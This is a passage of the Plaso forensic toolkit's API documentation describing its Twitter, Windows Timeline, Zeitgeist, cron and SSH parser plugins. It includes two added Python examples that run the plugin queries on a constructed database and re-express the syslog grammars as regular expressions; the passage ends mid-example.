TEXT,story_tag INT)', 'timeline': 'CREATE TABLE timeline (_id INTEGER PRIMARY KEY AUTOINCREMENT,owner_id INT,type INT,sort_index INT,entity_id INT,entity_type INT,data_type INT,data_type_group INT,data_type_tag INT,timeline_tag TEXT,timeline_group_id INT,timeline_scribe_group_id INT,data_id INT,data BLOB,flags INT,updated_at INT,data_origin_id TEXT,is_last INT,is_read INT,scribe_content BLOB,timeline_moment_info BLOB,dismissed INT NOT NULL DEFAULT 0,dismiss_actions INT NOT NULL DEFAULT 0)', 'tokens': 'CREATE TABLE tokens (_id INTEGER PRIMARY KEY,text TEXT,weight INT,type INT,ref_id INT)', 'topics': 'CREATE TABLE topics (_id INTEGER PRIMARY KEY,ev_id TEXT UNIQUE NOT NULL,ev_type INT,ev_query TEXT NOT NULL,ev_seed_hashtag TEXT,ev_title STRING,ev_subtitle STRING,ev_view_url STRING,ev_status STRING,ev_image_url TEXT,ev_explanation TEXT,ev_tweet_count INT,ev_start_time INT,ev_owner_id INT,ev_pc BLOB,ev_content BLOB,ev_hash INT)', 'user_groups': 'CREATE TABLE user_groups (_id INTEGER PRIMARY KEY,type INT,tag INT,rank INT,owner_id INT,user_id INT,is_last INT,pc BLOB,g_flags INT)', 'user_metadata': 'CREATE TABLE user_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,user_id INT NOT NULL,user_group_type INT NOT NULL,user_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_follow_count INT,user_title TEXT,token TEXT)', 'users': 'CREATE TABLE users (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,username TEXT,name TEXT,description TEXT,web_url TEXT,bg_color INT,location TEXT,structured_location BLOB,user_flags INT,followers INT,fast_followers INT DEFAULT 0,friends INT,statuses INT,profile_created INT,image_url TEXT,hash INT,updated INT,friendship INT,friendship_time INT,favorites INT DEFAULT 0,header_url TEXT,description_entities BLOB,url_entities BLOB,media_count INT,extended_profile_fields BLOB,pinned_tweet_id INT,link_color INT,advertiser_type TEXT,business_profile_state TEXT)'}]
class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventData
Bases: plaso.containers.events.EventData
Twitter on Android search event data.
name: twitter name handle.
Type str
search_query: search query.
Type str
DATA_TYPE = 'twitter:android:search'
class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData
Bases: plaso.containers.events.EventData
Twitter on Android status event data.
identifier: status row identifier.
Type int
author_identifier: twitter account identifier.
Type int
username: twitter account handle.
Type str
content: status content.
Type str
favorited: favorited flag as 0/1 value.
Type int
retweeted: retweeted flag as 0/1 value.
Type int
DATA_TYPE = 'twitter:android:status'
plaso.parsers.sqlite_plugins.twitter_ios module
SQLite parser plugin for Twitter on iOS 8+ database files.
class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventData
Bases: plaso.containers.events.EventData
Twitter on iOS 8+ contact event data.
description: description of the profile.
Type str
followers_count: number of accounts following the contact.
Type int
following_count: number of accounts the contact is following.
Type int
following: 1 if the contact is following the user’s account, 0 if not.
Type int
location: location of the profile.
Type str
name: name of the profile.
Type str
profile_url: URL of the profile picture.
Type str
screen_name: screen name.
Type str
url: URL of the profile.
Type str
DATA_TYPE = 'twitter:ios:contact'
class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Twitter on iOS 8+ database files.
The Twitter on iOS 8+ database file is typically stored in: /private/var/mobile/Containers/Data/Application/Library/Caches/databases/twitter.db
DATA_FORMAT = 'Twitter on iOS 8 and later SQLite database (twitter.db) file'
NAME = 'twitter_ios'
ParseContactRow(parser_mediator, query, row, **unused_kwargs)
Parses a contact row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
ParseStatusRow(parser_mediator, query, row, **unused_kwargs)
Parses a status row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
QUERIES = [('SELECT createdDate, updatedAt, screenName, name, profileImageUrl,location, description, url, following, followersCount, followingCount FROM Users ORDER BY createdDate', 'ParseContactRow'), ('SELECT Statuses.date AS date, Statuses.text AS text, Statuses.userId AS user_id, Users.name AS name, Statuses.retweetCount AS retweetCount, Statuses.favoriteCount AS favoriteCount, Statuses.favorited AS favorited, Statuses.updatedAt AS updatedAt FROM Statuses LEFT join Users ON Statuses.userId = Users.id ORDER BY date', 'ParseStatusRow')]
REQUIRED_STRUCTURE = {'Statuses': frozenset({'date', 'favoriteCount', 'favorited', 'retweetCount', 'text', 'updatedAt', 'userId'}), 'Users': frozenset({'createdDate', 'description', 'followersCount', 'following', 'followingCount', 'id', 'location', 'name', 'profileImageUrl', 'screenName', 'updatedAt', 'url'})}
SCHEMAS = [{'Lists': "CREATE TABLE Lists ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )", 'ListsShadow': "CREATE TABLE ListsShadow ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )", 'MyRetweets': "CREATE TABLE MyRetweets ( 'statusId' INTEGER PRIMARY KEY, 'myRetweetId' INTEGER )", 'Statuses': "CREATE TABLE Statuses ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplmentalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )", 'StatusesShadow': "CREATE TABLE StatusesShadow ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplementalLanguage' TEXT, 
'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )", 'Users': "CREATE TABLE Users ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )", 'UsersShadow': "CREATE TABLE UsersShadow ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )"}]
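As an added example (not Plaso's or Twitter's code), the Python below runs the two QUERIES of the twitter_ios plugin against a constructed database that carries only the Users and Statuses columns those queries reference, and maps each row onto the attribute names of TwitterIOSContactEventData and TwitterIOSStatusEventData. The REAL date columns are decoded as Cocoa timestamps (seconds since 2001-01-01 UTC); that encoding, the conversion helper, the sample rows and the 'Creation Time'/'Update Time' labels are this example's own assumptions and are not stated in the reference above.

```python
import datetime
import sqlite3

# Queries copied from the twitter_ios plugin's QUERIES entry above.
TWITTER_IOS_CONTACT_QUERY = (
    'SELECT createdDate, updatedAt, screenName, name, profileImageUrl,'
    'location, description, url, following, followersCount, followingCount '
    'FROM Users ORDER BY createdDate')
TWITTER_IOS_STATUS_QUERY = (
    'SELECT Statuses.date AS date, Statuses.text AS text, '
    'Statuses.userId AS user_id, Users.name AS name, '
    'Statuses.retweetCount AS retweetCount, '
    'Statuses.favoriteCount AS favoriteCount, Statuses.favorited AS favorited, '
    'Statuses.updatedAt AS updatedAt FROM Statuses '
    'LEFT join Users ON Statuses.userId = Users.id ORDER BY date')

# Assumption of this example: the REAL date columns hold Cocoa timestamps,
# i.e. seconds since 2001-01-01 00:00:00 UTC.
COCOA_EPOCH = datetime.datetime(2001, 1, 1, tzinfo=datetime.timezone.utc)


def cocoa_time_to_datetime(value):
    """Converts a Cocoa timestamp to an aware UTC datetime; NULL or 0 -> None."""
    if not value:
        return None
    return COCOA_EPOCH + datetime.timedelta(seconds=float(value))


def build_sample_twitter_database():
    """Builds a constructed twitter.db with just the columns the queries need.

    Column names and types follow the Users and Statuses schema above; the
    rows are invented. Status 2 names a userId that is not cached in Users.
    """
    connection = sqlite3.connect(':memory:')
    connection.execute(
        "CREATE TABLE Users ( 'id' INTEGER PRIMARY KEY, "
        "'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'name' TEXT, "
        "'location' TEXT, 'description' TEXT, 'url' TEXT, 'following' INTEGER, "
        "'followingCount' INTEGER, 'followersCount' INTEGER, 'updatedAt' REAL, "
        "'createdDate' REAL )")
    connection.execute(
        "CREATE TABLE Statuses ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, "
        "'date' REAL, 'userId' INTEGER, 'retweetCount' INTEGER, "
        "'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL )")
    connection.execute(
        'INSERT INTO Users VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',
        (42, 'analyst', 'https://example.invalid/a.png', 'Example Analyst',
         'Reykjavik', 'constructed profile', 'https://example.invalid',
         1, 10, 20, 600000000.0, 599990000.0))
    connection.executemany(
        'INSERT INTO Statuses VALUES (?, ?, ?, ?, ?, ?, ?, ?)',
        [(1, 'first constructed tweet', 600000000.0, 42, 3, 5, 0, 600000000.0),
         (2, 'tweet by an uncached author', 600003600.0, 99, 0, 0, 1, 0.0)])
    connection.commit()
    return connection


def parse_contacts(connection):
    """Runs the contact query; returns TwitterIOSContactEventData-style dicts
    plus the two decoded timestamps of each Users row."""
    connection.row_factory = sqlite3.Row
    contacts = []
    for row in connection.execute(TWITTER_IOS_CONTACT_QUERY):
        contacts.append({
            'data_type': 'twitter:ios:contact',
            'created': cocoa_time_to_datetime(row['createdDate']),
            'updated': cocoa_time_to_datetime(row['updatedAt']),
            'screen_name': row['screenName'],
            'name': row['name'],
            'profile_url': row['profileImageUrl'],
            'location': row['location'],
            'description': row['description'],
            'url': row['url'],
            'following': row['following'],
            'followers_count': row['followersCount'],
            'following_count': row['followingCount'],
        })
    return contacts


def parse_statuses(connection):
    """Runs the status query; returns one (timestamp, description, event_data)
    record per non-empty date column, so a row with both dates set yields a
    creation record and an update record (labels are this example's own)."""
    connection.row_factory = sqlite3.Row
    records = []
    for row in connection.execute(TWITTER_IOS_STATUS_QUERY):
        event_data = {
            'data_type': 'twitter:ios:status',
            'text': row['text'],
            'user_id': row['user_id'],
            'name': row['name'],  # None when the author is not in Users.
            'retweet_count': row['retweetCount'],
            'favorite_count': row['favoriteCount'],
            'favorited': row['favorited'],
        }
        for column, description in (('date', 'Creation Time'),
                                    ('updatedAt', 'Update Time')):
            timestamp = cocoa_time_to_datetime(row[column])
            if timestamp is not None:
                records.append((timestamp, description, event_data))
    return records
```

Two details worth noticing when reviewing output from this plugin: the status query is a LEFT JOIN, so a tweet whose author is not cached in Users still produces an event, with name set to None rather than being dropped; and a zero or NULL date column produces no record at all, so a status with only its date set contributes a single event.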
class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData
Bases: plaso.containers.events.EventData
Parent class for Twitter on iOS 8+ status events.
favorite_count (int): number of times the status message has been favorited.
favorited (int): value to mark status as favorite by the account.
name (str): user’s profile name.
retweet_count (str): number of times the status message has been retweeted.
290 Chapter 5. plaso package
Plaso (log2timeline), Release 20201007
text (str): content of the status message.
user_id (int): user unique identifier.
DATA_TYPE = 'twitter:ios:status'
plaso.parsers.sqlite_plugins.windows_timeline module
SQLite parser plugin for Windows 10 Timeline database files.
class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData
Bases: plaso.containers.events.EventData
Windows Timeline database generic event data.
package_identifier (str): the package ID or path to the executable run. Depending on the program, this either looks like a path (for example, c:\python34\python.exe) or like a package name (for example Docker.DockerForWindows.Settings).
description (str): this is an optional field, used to describe the action in the timeline view, and is usually populated with the path of the file currently open in the program described by package_identifier. Otherwise None.
application_display_name (str): a more human-friendly version of the package_identifier, such as ‘Docker for Windows’ or ‘Microsoft Store’.
DATA_TYPE = 'windows:timeline:generic'
class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Windows 10 Timeline database files.
The Windows 10 Timeline database file is typically stored in: %APPDATA%\Local\ConnectedDevicesPlatform\L.<username>\ActivitiesCache.db
DATA_FORMAT = 'Windows 10 Timeline SQLite database (ActivitiesCache.db) file'
NAME = 'windows_timeline'
ParseGenericRow(parser_mediator, query, row, **unused_kwargs)
Parses a generic Windows timeline row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParseUserEngagedRow(parser_mediator, query, row, **unused_kwargs)
Parses a timeline row that describes a user interacting with an app.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT StartTime, Payload, PackageName FROM Activity INNER JOIN Activity_PackageId ON Activity.Id = Activity_PackageId.ActivityId WHERE instr(Payload, "UserEngaged") > 0 AND Platform = "packageid"', 'ParseUserEngagedRow'), ('SELECT StartTime, Payload, AppId FROM Activity WHERE instr(Payload, "UserEngaged") = 0', 'ParseGenericRow')]
REQUIRED_STRUCTURE = {'Activity': frozenset({'AppId', 'Id', 'PackageName', 'Payload', 'StartTime'}), 'Activity_PackageId': frozenset({'ActivityId'})}
SCHEMAS = [{'Activity': 'CREATE TABLE [Activity]([Id] GUID PRIMARY KEY NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ActivityStatus] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [IsLocalOnly] INT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)', 'ActivityAssetCache': 'CREATE TABLE [ActivityAssetCache]([ResourceId] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, [AppId] TEXT NOT NULL, [AssetHash] TEXT NOT NULL, [TimeToLive] DATETIME NOT NULL, [AssetUri] TEXT, [AssetId] TEXT, [AssetKey] TEXT, [Contents] BLOB)', 'ActivityOperation': 'CREATE TABLE [ActivityOperation]([OperationOrder] INTEGER PRIMARY KEY ASC NOT NULL, [Id] GUID NOT NULL, [OperationType] INT NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [CreatedTime] DATETIME, [Attachments] TEXT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME NOT NULL, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME NOT NULL, [CorrelationVector] TEXT, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)', 'Activity_PackageId': 'CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL, [PackageName] TEXT NOT NULL, [ExpirationTime] DATETIME NOT NULL)', 'AppSettings': 'CREATE TABLE [AppSettings]([AppId] TEXT PRIMARY KEY NOT NULL, 
[SettingsPropertyBag] BLOB, [AppTitle] TEXT, [Logo4141] TEXT)', 'ManualSequence': 'CREATE TABLE [ManualSequence]([Key] TEXT PRIMARY KEY NOT NULL, [Value] INT NOT NULL)', 'Metadata': 'CREATE TABLE [Metadata]([Key] TEXT PRIMARY KEY NOT NULL, [Value] TEXT)'}]
class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventData
Bases: plaso.containers.events.EventData
Windows Timeline database User Engaged event data.
Contains information describing how long a user interacted with an application for.
package_identifier (str): the package ID or location of the executable the user interacted with.
reporting_app (str): the name of the application that reported the user’s interaction. This is the name of a monitoring tool, for example “ShellActivityMonitor”.
active_duration_seconds (int): the number of seconds the user spent interacting with the program.
DATA_TYPE = 'windows:timeline:user_engaged'
plaso.parsers.sqlite_plugins.zeitgeist module
SQLite parser plugin for Zeitgeist activity database files.
class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Zeitgeist activity database files.
Zeitgeist is a service which logs the user activities and events, anywhere from files opened to websites visited and conversations.
DATA_FORMAT = 'Zeitgeist activity SQLite database file'
NAME = 'zeitgeist'
ParseZeitgeistEventRow(parser_mediator, query, row, **unused_kwargs)
Parses a Zeitgeist event row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT id, timestamp, subj_uri FROM event_view', 'ParseZeitgeistEventRow')]
REQUIRED_STRUCTURE = {'actor': frozenset({}), 'event': frozenset({'id', 'timestamp'}), 'event_view': frozenset({'id', 'subj_uri', 'timestamp'})}
SCHEMAS = [{'actor': 'CREATE TABLE actor ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'event': 'CREATE TABLE event ( id INTEGER, timestamp INTEGER, interpretation INTEGER, manifestation INTEGER, actor INTEGER, payload INTEGER, subj_id INTEGER, subj_interpretation INTEGER, subj_manifestation INTEGER, subj_origin INTEGER, subj_mimetype INTEGER, subj_text INTEGER, subj_storage INTEGER, origin INTEGER, subj_id_current INTEGER, CONSTRAINT interpretation_fk FOREIGN KEY(interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT manifestation_fk FOREIGN KEY(manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT actor_fk FOREIGN KEY(actor) REFERENCES actor(id) ON DELETE CASCADE, CONSTRAINT origin_fk FOREIGN KEY(origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT payload_fk FOREIGN KEY(payload) REFERENCES payload(id) ON DELETE CASCADE, CONSTRAINT subj_id_fk FOREIGN KEY(subj_id) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_id_current_fk FOREIGN KEY(subj_id_current) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_interpretation_fk FOREIGN KEY(subj_interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT subj_manifestation_fk FOREIGN KEY(subj_manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT subj_origin_fk FOREIGN KEY(subj_origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_mimetype_fk FOREIGN KEY(subj_mimetype) REFERENCES mimetype(id) ON DELETE CASCADE, CONSTRAINT subj_text_fk FOREIGN KEY(subj_text) REFERENCES text(id) ON DELETE CASCADE, CONSTRAINT subj_storage_fk FOREIGN KEY(subj_storage) REFERENCES storage(id) ON DELETE CASCADE, CONSTRAINT unique_event UNIQUE (timestamp, interpretation, manifestation, actor, subj_id) )', 'extensions_conf': 'CREATE TABLE extensions_conf ( extension VARCHAR, key VARCHAR, value BLOB, CONSTRAINT unique_extension UNIQUE (extension, key) )', 'interpretation': 'CREATE TABLE interpretation ( id INTEGER PRIMARY KEY 
AUTOINCREMENT, value VARCHAR UNIQUE )', 'manifestation': 'CREATE TABLE manifestation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'mimetype': 'CREATE TABLE mimetype ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'payload': 'CREATE TABLE payload (id INTEGER PRIMARY KEY, value BLOB)', 'schema_version': 'CREATE TABLE schema_version ( schema VARCHAR PRIMARY KEY ON CONFLICT REPLACE, version INT )', 'storage': 'CREATE TABLE storage ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE, state INTEGER, icon VARCHAR, display_name VARCHAR )', 'text': 'CREATE TABLE text ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )', 'uri': 'CREATE TABLE uri ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )'}]
class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityEventData
Bases: plaso.containers.events.EventData
Zeitgeist activity event data.
subject_uri (str): subject URI.
DATA_TYPE = 'zeitgeist:activity'
Module contents
Imports for the SQLite database parser plugins.
plaso.parsers.syslog_plugins package
Submodules
plaso.parsers.syslog_plugins.cron module
This file contains a plugin for cron syslog entries.
class plaso.parsers.syslog_plugins.cron.CronSyslogPlugin
Bases: plaso.parsers.syslog_plugins.interface.SyslogPlugin
A syslog plugin for parsing cron messages.
DATA_FORMAT = 'Cron syslog line'
MESSAGE_GRAMMARS = [('task_run', {{{{{{{"(" W:(ABCD...)} ")"} "CMD"} "("} Combine:(SkipTo:({")" StringEnd}))} ")"} StringEnd})]
NAME = 'cron'
ParseMessage(parser_mediator, key, date_time, tokens)
Parses a syslog body that matched one of the defined grammars.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the matching grammar.
• date_time (dfdatetime.DateTimeValues) – date and time values.
• tokens (dict[str, str]) – tokens derived from a syslog message based on the defined grammar.
Raises ValueError – If an unknown key is provided.
REPORTER = 'CRON'
class plaso.parsers.syslog_plugins.cron.CronTaskRunEventData
Bases: plaso.parsers.syslog.SyslogLineEventData
Cron task run event data.
command (str): command executed.
username (str): name of the user the command was executed as.
DATA_TYPE = 'syslog:cron:task_run'
plaso.parsers.syslog_plugins.interface module
This file contains the interface for syslog plugins.
class plaso.parsers.syslog_plugins.interface.SyslogPlugin
Bases: plaso.parsers.plugins.BasePlugin
The interface for syslog plugins.
DATA_FORMAT = 'Syslog file'
MESSAGE_GRAMMARS = []
NAME = 'syslog_plugin'
abstract ParseMessage(parser_mediator, key, date_time, tokens)
Parses a syslog body that matched one of the grammars the plugin defined.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• date_time (dfdatetime.DateTimeValues) – date and time values.
• tokens (dict[str, str]) – names of the fields extracted by the syslog parser and the matching grammar, and values are the values of those fields.
Process(parser_mediator, date_time, syslog_tokens, **kwargs)
Processes the data structure produced by the parser.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• date_time (dfdatetime.DateTimeValues) – date and time values.
• syslog_tokens (dict[str, str]) – names of the fields extracted by the syslog parser and the matching grammar, and values are the values of those fields.
Raises
• AttributeError – If the syslog_tokens do not include a ‘body’ attribute.
• WrongPlugin – If the plugin is unable to parse the syslog tokens.
REPORTER = ''
plaso.parsers.syslog_plugins.ssh module
This file contains a plugin for SSH syslog entries.
class plaso.parsers.syslog_plugins.ssh.SSHEventData
Bases: plaso.parsers.syslog.SyslogLineEventData
SSH event data.
address (str): IP address.
authentication_method (str): authentication method.
fingerprint (str): fingerprint.
port (str): port.
protocol (str): protocol.
username (str): name of the user the command was executed as.
class plaso.parsers.syslog_plugins.ssh.SSHFailedConnectionEventData
Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData
SSH failed connection event data.
DATA_TYPE = 'syslog:ssh:failed_connection'
class plaso.parsers.syslog_plugins.ssh.SSHLoginEventData
Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData
SSH login event data.
DATA_TYPE = 'syslog:ssh:login'
class plaso.parsers.syslog_plugins.ssh.SSHOpenedConnectionEventData
Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData
SSH opened connection event data.
DATA_TYPE = 'syslog:ssh:opened_connection'
class plaso.parsers.syslog_plugins.ssh.SSHSyslogPlugin
Bases: plaso.parsers.syslog_plugins.interface.SyslogPlugin
A plugin for creating events from syslog messages produced by SSH.
DATA_FORMAT = 'SSH syslog line'
MESSAGE_GRAMMARS = [('login', {{{{{{{{{{"Accepted" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} "ssh2"} [{":" Combine:({"RSA " W:(:012...)})}]} StringEnd}), ('failed_connection', {{{{{{{{"Failed" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} StringEnd}), ('opened_connection', {{{{"Connection from" {IPv4 address | IPv6 address}} "port"} W:(0123...)} LineEnd})]
NAME = 'ssh'
ParseMessage(parser_mediator, key, date_time, tokens)
Produces an event from a syslog body that matched one of the grammars.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the matching grammar.
• date_time (dfdatetime.DateTimeValues) – date and time values.
• tokens (dict[str, str]) – tokens derived from a syslog message based on the defined grammar.
Raises ValueError – If an unknown key is provided.
REPORTER = 'sshd'
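Added example, not plaso code: regular-expression equivalents of the cron task_run grammar listed under the cron plugin above and of the three sshd grammars listed here, with a Process/ParseMessage dispatcher that mirrors how the syslog plugin interface hands a matched body to a plugin (AttributeError without a body, WrongPlugin when nothing matches, ValueError for an unknown key). The sample lines, the line layout, the WrongPlugin class and the helper names are constructed for this example and are not part of the project.

```python
import re

# Stand-ins for the grammar tokens: the IPv4/IPv6 alternatives, W:(ABCD...)
# (a word of letters) and W:(0123...) (a word of digits).
_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
_IPV6 = r"[0-9A-Fa-f:]+"  # simplified colon-hex form, enough for syslog bodies
_ADDRESS = "(?:" + _IPV4 + "|" + _IPV6 + ")"
_ALPHA_WORD = r"[A-Za-z]+"

# Each plugin's MESSAGE_GRAMMARS as (key, pattern); patterns are tried in
# order and must match the whole body, like the pyparsing StringEnd().
CRON_GRAMMARS = [
    ("task_run", re.compile(
        r"^\((?P<username>" + _ALPHA_WORD + r")\) CMD \((?P<command>.*)\)$")),
]
SSH_GRAMMARS = [
    ("login", re.compile(
        r"^Accepted (?P<authentication_method>password|publickey) for "
        r"(?P<username>" + _ALPHA_WORD + r") from (?P<address>" + _ADDRESS +
        r") port (?P<port>[0-9]+) ssh2(?:: (?P<fingerprint>RSA [0-9a-f:]+))?$")),
    ("failed_connection", re.compile(
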